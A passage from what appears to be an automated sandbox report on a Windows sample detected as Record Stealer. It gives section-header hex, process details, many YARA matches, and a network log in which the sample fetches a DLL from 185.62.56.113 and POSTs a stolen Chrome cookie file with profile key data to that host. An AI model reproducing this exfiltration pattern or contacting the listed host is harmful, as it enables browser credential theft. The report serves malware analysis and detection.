0c 00 00 02 00 00 00 ba 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 00 0d 00 00 02 00 00 00 bc 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 10 0d 00 00 06 00 00 00 be 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 e0 3b 00 00 00 20 0d 00 00 3c 00 00 00 c4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 60 0d 00 00 06 00 00 00 00 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 70 0d 00 00 ca 00 00 00 06 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 40 0e 00 00 28 00 00 00 d0 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 70 0e 00 00 2e 00 00 00 f8 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 35 37 00 00 00 00 00 5c 0b 00 00 00 a0 0e 00 00 0c 00 00 00 26 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 37 30 00 00 00 00 00 23 03 00 00 00 b0 0e 00 00 04 00 00 00 32 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 38 31 00 00 00 00 00 73 3a 00 00 00 c0 0e 00 00 3c 00 00 00 36 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 39 32 00 00 00 00 00 50 03 00 00 00
                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL",bv! a n* ;.text`P`.data|' (@`.rdataDPF:@`@.bss(`.edatan*,@0@.idata@0.CRT,@0.tls @0.rsrc@0.reloc; <@0B/48`@@B/19Rp@B/31]'@(@B/45-p.@B/57\&@0B/70#2@B/81s:<6@B/92P
                                            Jun 26, 2022 09:36:28.466788054 CEST6586OUTGET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/nssdbm3.dll HTTP/1.1
                                            Content-Type: text/plain;
                                            User-Agent: record
                                            Host: 185.62.56.113
                                            Connection: Keep-Alive
                                            Cache-Control: no-cache
                                            Jun 26, 2022 09:36:28.516218901 CEST6587INHTTP/1.1 404 Not Found
                                            Server: nginx/1.14.0 (Ubuntu)
                                            Date: Sun, 26 Jun 2022 07:36:28 GMT
                                            Content-Type: text/html
                                            Content-Length: 162
                                            Connection: keep-alive
                                            Vary: Accept-Encoding
                                            Vary: Accept-Encoding
                                            Vary: Accept-Encoding
                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>
                                            Jun 26, 2022 09:36:28.999142885 CEST6587OUTPOST /c5e0a800e57a53b399120e5a97b50daa HTTP/1.1
                                            Accept: */*
                                            Content-Type: multipart/form-data; boundary=CgQIAj0P7gYM6Lsg
                                            User-Agent: record
                                            Host: 185.62.56.113
                                            Content-Length: 7371
                                            Connection: Keep-Alive
                                            Cache-Control: no-cache
                                            Jun 26, 2022 09:36:29.055579901 CEST6595INHTTP/1.1 200 OK
                                            Server: nginx/1.14.0 (Ubuntu)
                                            Date: Sun, 26 Jun 2022 07:36:29 GMT
                                            Content-Type: text/html; charset=utf-8
                                            Content-Length: 8
                                            Connection: keep-alive
                                            Content-Security-Policy: default-src 'self';base-uri 'self';block-all-mixed-content;font-src 'self' https: data:;form-action 'self';frame-ancestors 'self';img-src 'self' data:;object-src 'none';script-src 'self';script-src-attr 'none';style-src 'self' https: 'unsafe-inline';upgrade-insecure-requests
                                            Cross-Origin-Embedder-Policy: require-corp
                                            Cross-Origin-Opener-Policy: same-origin
                                            Cross-Origin-Resource-Policy: same-origin
                                            X-DNS-Prefetch-Control: off
                                            Expect-CT: max-age=0
                                            X-Frame-Options: SAMEORIGIN
                                            Strict-Transport-Security: max-age=15552000; includeSubDomains
                                            X-Download-Options: noopen
                                            X-Content-Type-Options: nosniff
                                            Origin-Agent-Cluster: ?1
                                            X-Permitted-Cross-Domain-Policies: none
                                            Referrer-Policy: no-referrer
                                            X-XSS-Protection: 0
                                            ETag: W/"8-OEKKaYqxIiVAaA56t44dc56a/Rw"
                                            Data Raw: 72 65 63 65 69 76 65 64
                                            Data Ascii: received
                                            Jun 26, 2022 09:36:30.860903978 CEST6596OUTPOST /c5e0a800e57a53b399120e5a97b50daa HTTP/1.1
                                            Accept: */*
                                            Content-Type: multipart/form-data; boundary=8O69Jb3Z703tm6Ql
                                            User-Agent: record
                                            Host: 185.62.56.113
                                            Content-Length: 598
                                            Connection: Keep-Alive
                                            Cache-Control: no-cache
                                            Data Raw: 2d 2d 38 4f 36 39 4a 62 33 5a 37 30 33 74 6d 36 51 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 5c 63 6f 6f 6b 69 65 73 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6f 62 6a 65 63 74 0d 0a 0d 0a 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 09 54 52 55 45 09 2f 09 54 52 55 45 09 31 33 32 36 31 37 36 31 38 32 38 39 35 32 35 32 32 09 4e 49 44 09 64 6a 45 77 6e 73 7a 38 38 6c 67 76 57 41 45 5a 6a 30 39 68 53 67 56 6c 76 54 31 69 69 36 45 54 4d 6b 31 4c 56 57 51 4e 4f 43 4c 2f 62 2b 6a 36 53 49 36 46 35 44 54 4a 44 56 39 2f 34 30 6e 53 63 6b 64 74 4e 71 41 69 52 36 54 44 71 41 56 76 58 51 52 4e 73 64 43 34 58 72 49 46 54 55 62 59 42 31 6b 4c 66 6d 6b 32 31 58 34 44 6a 53 56 39 62 2b 59 67 56 6a 54 6e 53 30 5a 53 55 4e 65 43 33 48 79 58 58 73 47 51 38 46 64 76 4e 74 63 78 54 6b 55 6c 6d 39 43 65 51 6c 2b 36 36 44 67 74 73 75 41 6b 6e 61 59 36 47 55 4f 54 54 70 43 42 2f 70 42 7a 45 51 72 73 53 6e 2b 44 48 58 37 42 74 76 6b 53 2f 76 44 47 79 42 48 48 59 6f 39 58 45 78 6d 48 69 58 56 43 47 6d 53 62 75 58 4d 61 44 42 4c 4a 32 45 42 76 56 5a 4b 6d 55 5a 71 73 78 53 69 79 68 52 5a 58 75 41 56 2f 53 38 74 33 74 31 55 46 34 6a 47 76 57 4c 79 77 79 7a 65 54 65 7a 4d 3d 0a 43 3a 5c 55 73 65 72 73 5c 61 6c 66 6f 6e 73 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 47 6f 6f 67 6c 65 5c 43 68 72 6f 6d 65 5c 55 73 65 72 20 44 61 74 61 5c 44 65 66 61 75 6c 74 7c 4e 63 44 4b 69 79 36 50 4f 59 32 5a 2f 62 6c 37 56 36 33 37 42 50 36 42 56 34 66 2f 65 48 51 58 6f 49 78 56 49 50 6f 52 77 72 67 3d 7c 38 35 2e 30 2e 34 31 38 33 2e 31 32 31 2d 36 34 0d 0a 0d 0a 2d 2d 38 4f 36 39 4a 62 33 5a 37 30 33 74 6d 36 51 6c 2d 2d
                                            Data Ascii: --8O69Jb3Z703tm6QlContent-Disposition: form-data; name="file"; filename="\cookies.txt"Content-Type: application/x-object.google.comTRUE/TRUE13261761828952522NIDdjEwnsz88lgvWAEZj09hSgVlvT1ii6ETMk1LVWQNOCL/b+j6SI6F5DTJDV9/40nSckdtNqAiR6TDqAVvXQRNsdC4XrIFTUbYB1kLfmk21X4DjSV9b+YgVjTnS0ZSUNeC3HyXXsGQ8FdvNtcxTkUlm9CeQl+66DgtsuAknaY6GUOTTpCB/pBzEQrsSn+DHX7BtvkS/vDGyBHHYo9XExmHiXVCGmSbuXMaDBLJ2EBvVZKmUZqsxSiyhRZXuAV/S8t3t1UF4jGvWLywyzeTezM=C:\Users\user\AppData\Local\Google\Chrome\User Data\Default|NcDKiy6POY2Z/bl7V637BP6BV4f/eHQXoIxVIPoRwrg=|85.0.4183.121-64--8O69Jb3Z703tm6Ql--
                                            Jun 26, 2022 09:36:30.914144993 CEST6597INHTTP/1.1 200 OK
                                            Server: nginx/1.14.0 (Ubuntu)
                                            Date: Sun, 26 Jun 2022 07:36:30 GMT
                                            Content-Type: text/html; charset=utf-8
                                            Content-Length: 8
                                            Connection: keep-alive
                                            Content-Security-Policy: default-src 'self';base-uri 'self';block-all-mixed-content;font-src 'self' https: data:;form-action 'self';frame-ancestors 'self';img-src 'self' data:;object-src 'none';script-src 'self';script-src-attr 'none';style-src 'self' https: 'unsafe-inline';upgrade-insecure-requests
                                            Cross-Origin-Embedder-Policy: require-corp
                                            Cross-Origin-Opener-Policy: same-origin
                                            Cross-Origin-Resource-Policy: same-origin
                                            X-DNS-Prefetch-Control: off
                                            Expect-CT: max-age=0
                                            X-Frame-Options: SAMEORIGIN
                                            Strict-Transport-Security: max-age=15552000; includeSubDomains
                                            X-Download-Options: noopen
                                            X-Content-Type-Options: nosniff
                                            Origin-Agent-Cluster: ?1
                                            X-Permitted-Cross-Domain-Policies: none
                                            Referrer-Policy: no-referrer
                                            X-XSS-Protection: 0
                                            ETag: W/"8-OEKKaYqxIiVAaA56t44dc56a/Rw"
                                            Data Raw: 72 65 63 65 69 76 65 64
                                            Data Ascii: received


                                            No statistics
                                            Target ID:0
                                            Start time:09:36:10
                                            Start date:26/06/2022
                                            Path:C:\Users\user\Desktop\VASkmEQ4iU.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\Desktop\VASkmEQ4iU.exe"
                                            Imagebase:0xde0000
                                            File size:7389696 bytes
                                            MD5 hash:F9B340F49AB31913222C64D3EED70ED3
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_RecordStealer, Description: Yara detected Record Stealer, Source: 00000000.00000003.460242946.0000000001A2E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_RecordStealer, Description: Yara detected Record Stealer, Source: 00000000.00000003.470300145.0000000001A2E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_RecordStealer, Description: Yara detected Record Stealer, Source: 00000000.00000003.458303380.0000000001A2E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_RecordStealer, Description: Yara detected Record Stealer, Source: 00000000.00000003.468368220.0000000001A2E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_RecordStealer, Description: Yara detected Record Stealer, Source: 00000000.00000003.446552049.0000000001A51000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_RecordStealer, Description: Yara detected Record Stealer, Source: 00000000.00000003.466555483.0000000001A2E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_RecordStealer, Description: Yara detected Record Stealer, Source: 00000000.00000003.446585684.0000000001A57000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_RecordStealer, Description: Yara detected Record Stealer, Source: 00000000.00000003.451981881.0000000001A2E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_RecordStealer, Description: Yara detected Record Stealer, Source: 00000000.00000003.446651246.0000000001A2E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_RecordStealer, Description: Yara detected Record Stealer, Source: 00000000.00000003.446518544.0000000001A2E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_RecordStealer, Description: Yara detected Record Stealer, Source: 00000000.00000002.481057037.0000000001A2E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_RecordStealer, Description: Yara detected Record Stealer, Source: 00000000.00000003.454619131.0000000001A2E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_RecordStealer, Description: Yara detected Record Stealer, Source: 00000000.00000003.452125462.0000000001A2E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_RecordStealer, Description: Yara detected Record Stealer, Source: 00000000.00000003.446733215.0000000001A2E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_RecordStealer, Description: Yara detected Record Stealer, Source: 00000000.00000003.455974232.0000000001A2E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_RecordStealer, Description: Yara detected Record Stealer, Source: 00000000.00000003.469287857.0000000001A2E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                            Reputation:low

                                            No disassembly